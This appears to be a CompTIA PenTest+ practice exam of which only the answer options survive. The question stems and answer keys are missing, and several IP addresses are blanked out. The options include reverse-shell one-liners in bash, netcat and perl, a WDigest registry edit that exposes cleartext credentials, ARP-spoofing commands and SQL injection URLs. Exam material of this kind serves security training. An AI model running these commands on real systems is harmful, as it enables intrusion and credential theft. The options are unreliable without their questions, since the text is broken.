Exam 12: CompTIA PenTest+ Certification Exam

A) Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.
B) Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.
C) IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.
D) Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

A) Appendices
B) Executive summary
C) Technical summary
D) Main body

A) Very difficult; perimeter systems are usually behind a firewall.
B) Somewhat difficult; would require significant processing power to exploit.
C) Trivial; little effort is required to exploit this finding.
D) Impossible; external hosts are hardened to protect against attacks.

A) a target list
B) a network diagram
C) source code
D) privileged credentials

A) The physical location and network ESSIDs to be tested
B) The number of wireless devices owned by the client
C) The client's preferred wireless access point vendor
D) The bands and frequencies used by the client's devices

A) Stack pointer register
B) Index pointer register
C) Stack base pointer
D) Destination index register

A) Randomize local administrator credentials for each machine.
B) Disable remote logons for local administrators.
C) Require multifactor authentication for all logins.
D) Increase minimum password complexity requirements.
E) Apply additional network access control.
F) Enable full-disk encryption on every workstation.
G) Segment each host into its own VLAN.

A) Selection of the appropriate set of security testing tools
B) Current and load ratings of the ICS components
C) Potential operational and safety hazards
D) Electrical certification of hardware used in the test

A) Obsolete software may contain exploitable components.
B) Weak password management practices may be employed.
C) Cryptographically weak protocols may be intercepted.
D) Web server configurations may reveal sensitive information.

A) schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run
B) net session server | dsquery -user | net use c$
C) powershell && set-executionpolicy unrestricted
D) reg save HKLM\System\CurrentControlSet\Services\Sv.reg

A) msfconsole
B) workspace
C) msfvenom
D) db_init
E) db_connect

A) arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B) arpspoof -t 192.168.1.20 192.168.1.254
C) arpspoof -c both -t 192.168.1.20 192.168.1.253
D) arpspoof -r -t 192.168.1.253 192.168.1.20

A) arpspoof
B) nmap
C) responder
D) burpsuite

A) Insecure file permissions
B) Application whitelisting
C) Shell escape
D) Writable service

A) Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
B) Identify the issues that can be remediated most quickly and address them first.
C) Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
D) Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

A) Manufacturers developing IoT devices are less concerned with security.
B) It is difficult for administrators to implement the same security standards across the board.
C) IoT systems often lack the hardware power required by more secure solutions.
D) Regulatory authorities often have lower security requirements for IoT systems.

A) Cleartext exposure of SNMP trap data
B) Software bugs resident in the IT ticketing system
C) S/MIME certificate templates defined by the CA
D) Health information communicated over HTTP
E) DAR encryption on records servers

A) MAC address of the client
B) MAC address of the domain controller
C) MAC address of the web server
D) MAC address of the gateway

A) Convert to JAR.
B) Decompile.
C) Cross-compile the application.
D) Convert JAR files to DEX.
E) Re-sign the APK.
F) Attach to ADB.

A) Forced browsing vulnerability
B) Parameter pollution vulnerability
C) File upload vulnerability
D) Cookie enumeration

A) Wait outside of the company's building and attempt to tailgate behind an employee.
B) Perform a vulnerability scan against the company's external netblock, identify exploitable vulnerabilities, and attempt to gain access.
C) Use domain and IP registry websites to identify the company's external netblocks and external facing applications.
D) Search social media for information technology employees who post information about the technologies they work with.
E) Identify the company's external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

A) Implement a blacklist.
B) Block URL redirections.
C) Double URL encode the parameters.
D) Stop external calls from the application.

A) perl -e 'use SOCKET'; $i='; $p='443;
B) ssh superadmin@ -p 443
C) nc -e /bin/sh 443 nc -e /bin/sh 443
D) bash -i >& /dev/tcp//443 0>&1

A) Peach
B) CeWL
C) OpenVAS
D) Shodan

A) Obtain staff information by calling the company and using social engineering techniques.
B) Visit the client and use impersonation to obtain information from staff.
C) Send spoofed emails to staff to see if staff will respond with sensitive information.
D) Search the internet for information on staff such as social networking sites.

A) Mandate all employees take security awareness training.
B) Implement two-factor authentication for remote access.
C) Install an intrusion prevention system.
D) Increase password complexity requirements.
E) Install a security information event monitoring solution.
F) Prevent members of the IT department from interactively logging in as administrators.
G) Upgrade the cipher suite used for the VPN solution.

A) dsrm -users "DN=company.com; OU=hq CN=users"
B) dsuser -name -account -limit 3
C) dsquery user -inactive 3
D) dsquery -o -rdn -limit 21

A) Set the execution policy.
B) Execute a remote script.
C) Run an encoded command.
D) Instantiate an object.

A) HKEY_CLASSES_ROOT
B) HKEY_LOCAL_MACHINE
C) HKEY_CURRENT_USER
D) HKEY_CURRENT_CONFIG

A) Nikto
B) WAR
C) W3AF
D) Swagger

A) Kerberos
B) NetNTLMv1
C) NTLM
D) SHA-1

A) To the screen
B) To a network server
C) To a file
D) To /dev/null

A) Command injection attack
B) Clickjacking attack
C) Directory traversal attack
D) Remote file inclusion attack

A) The client has applied a hot fix without updating the version.
B) The threat landscape has significantly changed.
C) The client has updated their codebase with new features.
D) Thera are currently no known exploits for this vulnerability.

A) Vulnerability scan
B) Dynamic scan
C) Static scan
D) Compliance scan

A) Disable the network port of the affected service.
B) Complete all findings, and then submit them to the client.
C) Promptly alert the client with details of the finding.
D) Take the target offline so it cannot be exploited by an attacker.

A) The badge was cloned.
B) The physical access control server is malfunctioning.
C) The system reached the crossover error rate.
D) The employee lost the badge.

A) nmap -p 22 -iL targets
B) nmap -p 22 -sL targets
C) nmap -p 22 -oG targets
D) nmap -p 22 -oA targets

A) Perform an HTTP downgrade attack.
B) Harvest the user credentials to decrypt traffic.
C) Perform an MITM attack.
D) Implement a CA attack by impersonating trusted CAs.

A) Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.
B) Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof--of-concept to management.
C) Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.
D) Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

A) Arbitrary code execution
B) Session hijacking
C) SQL injection
D) Login credential brute-forcing
E) Cross-site request forgery

A) Common libraries
B) Configuration files
C) Sandbox escape
D) ASLR bypass

A) Rules of engagement
B) Mater services agreement
C) Statement of work
D) End-user license agreement

A) Unsecure service and protocol configuration
B) Running SMB and SMTP service
C) Weak password complexity and user account
D) Misconfiguration

A) Change 'fi' to 'Endlf'.
B) Remove the 'let' in front of 'dest=5+5'.
C) Change the '=' to '-eq'.
D) Change 'source' and 'dest' to "$source" and "$dest".
E) Change 'else' to 'elif'.

A) Missing secure flag for a sensitive cookie
B) Reflected cross-site scripting
C) Enabled directory listing
D) Insecure HTTP methods allowed
E) Unencrypted transfer of sensitive data
F) Command injection
G) Disclosure of internal system information
H) Support of weak cipher suites

A) fpipe.exe -1 8080 -r 80 100.170.60.5
B) ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5
C) nmap -sS -A -f 100.170.60.5
D) nc 100.170.60.5 8080 /bin/sh

A) hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt
B) hashcat -m 5600 hash.txt
C) hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a
D) hashcat -m 5600 -o results.text hash.txt wordlist.txt

A) Port scan
B) Service enumeration
C) Live host identification
D) Denial of service

A) Use path modification to escape the application's framework.
B) Create a frame that overlays the application.
C) Inject a malicious iframe containing JavaScript.
D) Pass an iframe attribute that is malicious.

A) The latest vulnerability scan results
B) A list of sample application requests
C) An up-to-date list of possible exploits
D) A list of sample test accounts

A) Log collection
B) Event collection
C) Keystroke monitoring
D) Debug message collection

A) Kernel vulnerabilities
B) Sticky bits
C) Unquoted service path
D) Misconfigured sudo

A) -p-
B) -p ALL
C) -p 1-65534
D) -port 1-65534

A) SOW
B) NDA
C) EULA
D) BPA

A) Penetration test findings often contain company intellectual property
B) Penetration test findings could lead to consumer dissatisfaction if made public.
C) Penetration test findings are legal documents containing privileged information.
D) Penetration test findings can assist an attacker in compromising a system.

A) Tcpdump
B) Nmap
C) Wireshark
D) SSH
E) Netcat
F) Cain and Abel

A) The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets.
B) The tester is trying to perform a more stealthy scan by including several bogus addresses.
C) The scanning machine has several interfaces to balance the scan request across at the specified rate.
D) A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.

A) dig -q any _kerberos._tcp.internal.comptia.net
B) dig -q any _lanman._tcp.internal.comptia.net
C) dig -q any _ntlm._tcp.internal.comptia.net
D) dig -q any _smtp._tcp.internal.comptia.net

A) -O
B) -iL
C) -sV
D) -sS
E) -oN
F) -oX

A) Ettercap
B) Tcpdump
C) Responder
D) Medusa

A) RID cycling to enumerate users and groups
B) Pass the hash to relay credentials
C) Password brute forcing to log into the host
D) Session hijacking to impersonate a system account

A) Removing the Bash history
B) Upgrading the shell
C) Creating a sandbox
D) Capturing credentials

A) Strong password policy
B) Password encryption
C) Email system hardening
D) Two-factor authentication

A) https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe'?&amount=200
B) https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200
C) https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' ?&amount=200
D) https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount='AND 1=1 AND select username from testbank.custinfo where username like 'Joe' ?&amount=200

A) Run a zero-day exploit.
B) Create a new domain user with a known password.
C) Modify a known boot time service to instantiate a call back.
D) Obtain cleartext credentials of the compromised user.

A) reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B) reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C) reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D) reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

A) Malicious file upload attack
B) Redirect attack
C) Directory traversal attack
D) Insecure direct object reference attack

A) nc -nlvp 443
B) nc 10.2.4.6. 443
C) nc -w3 10.2.4.6 443
D) nc -e /bin/sh 10.2.4.6. 443

A) LSASS
B) SAM database
C) Active Directory
D) Registry

A) Identity and eliminate inline SQL statements from the code.
B) Identify and eliminate dynamic SQL from stored procedures.
C) Identify and sanitize all user inputs.
D) Use a whitelist approach for SQL statements.
E) Use a blacklist approach for SQL statements.
F) Identify the source of malicious input and block the IP address.

A) Scope creep
B) Post-mortem review
C) Risk acceptance
D) Threat prevention

A) TCP SYN flood
B) SQL injection
C) XSS
D) XMAS scan

A) nmap -Pn -sT 100.100.1.0-125
B) nmap -sF -p 100.100.1.0-125
C) nmap -sV -oA output 100.100.10-125
D) nmap 100.100.1.0-125 -T4

A) Karma attack
B) Deauthentication attack
C) Fragmentation attack
D) SSDI broadcast flood

A) Exploits for vulnerabilities found
B) Detailed service configurations
C) Unpatched third-party software
D) Weak access control configurations

A) Ensure the scanner can make outbound DNS requests.
B) Ensure the scanner is configured to perform ARP resolution.
C) Ensure the scanner is configured to analyze IP hosts.
D) Ensure the scanner has the proper plug -ins loaded.

A) Enumeration of services
B) OSINT gathering
C) Port scanning
D) Social engineering

A) set rhost 192.168.1.10
B) run autoroute -s 192.168.1.0/24
C) db_nmap -iL /tmp/privatehosts.txt
D) use auxiliary/server/socks4a